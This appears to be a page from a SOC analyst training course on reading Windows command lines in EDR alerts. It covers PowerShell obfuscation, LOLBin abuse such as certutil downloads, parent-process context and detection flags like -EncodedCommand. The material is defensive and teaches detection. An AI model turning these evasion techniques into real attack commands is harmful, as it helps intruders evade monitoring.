Command line analysis
What to look for: inspection
Common Obfuscation Techniques used to make code, commands, or data difficult to understand or detect, used both by attackers and legitimately for IP protection. patterns observed in frameworks like PowerShell A command-line shell and scripting language built on the .NET framework, commonly used for system administration and potentially for malicious purposes. Empire and Cobalt Strike Legitimate post-exploitation tool widely abused for C2, lateral movement, and credential harvesting. Beaconing, fileless injection, encrypted comms. Pirated and cracked versions used by APTs, ransomware gangs, and commodity malware. Frequently paired with TrickBot or BazarLoader to coordinate ransomware deployment. :
Base64 encoding
powershell.exe -EncodedCommand <long-base64-string>The encoded blob hides the actual command from plain-text matching.
String concatenation
cmd.exe /c βeβ+βchoβ βHelloβBuilds commands at runtime to evade signature matching.
Variable expansion
$env:COMSPECUses environment variables to mask binary references.
Adversaries also abuse trusted system binaries: LOLBin Living Off the Land Binary. A trusted, signed system binary (regsvr32, mshta, wmic, certutil, rundll32) abused for malicious execution while appearing legitimate. such as certutil.exe for downloads, regsvr32.exe for DLL execution, bitsadmin.exe for transfers. These leave minimal forensic footprint because the binary itself is signed and trusted.
Execution context
The same command can be benign or malicious depending on context. Four contextual signals matter most:
NT AUTHORITY\SYSTEM vs. a standard user account. System-level execution from a user-initiated process is rarely legitimate.
Outside business hours vs. scheduled maintenance window. Cross-reference with change tickets and the userβs known patterns.
cmd.exe spawned by outlook.exe is suspicious. The same command from Task Scheduler is usually legitimate.
C:\Windows\Temp or %APPDATA% is suspicious. C:\Program Files is expected.
Example: PowerShell from Outlook
A PowerShell script launched by Outlook signals likely macro Execution The attacker successfully runs malicious code on a system, typically using interpreters, scripts, payloads, or legitimate tools. from an email attachment. What you would check next:
- The Outlook sessionβs recent attachment activity.
- The scriptβs Command Line In SOC analysis, the argument string a process was launched with. Often the load-bearing forensic field on an EDR alert because it reveals what the process was actually told to do. for download cradle patterns.
- Outbound network activity from PowerShell in the next 60 seconds.
- Whether the User An individual who interacts with a system, network, or application. βs mailbox shows similar emails to other recipients.
The same PowerShell command from Task Scheduler during a maintenance window is almost certainly legitimate. Same command, different parent, different verdict.
Pattern recognition
Build mental patterns for atypical use of common binaries. These are the shapes you want to recognize before reading the command in detail.
Unusual LOLBin invocations. rundll32.exe, mshta.exe, wmic.exe, regsvr32.exe invoked outside their normal contexts.
Framework flags. Command-line flags that suggest framework use: -NoP, -EncodedCommand, -WindowStyle Hidden, -NonInteractive.
Indirect execution. A trusted binary loading attacker-controlled content from a remote location. The binary is legitimate. The payload is not.
Next up
Process relationships
Parent-child chains and lineage reconstruction. Macro execution, persistence, hollowing, token theft.
Read process relationships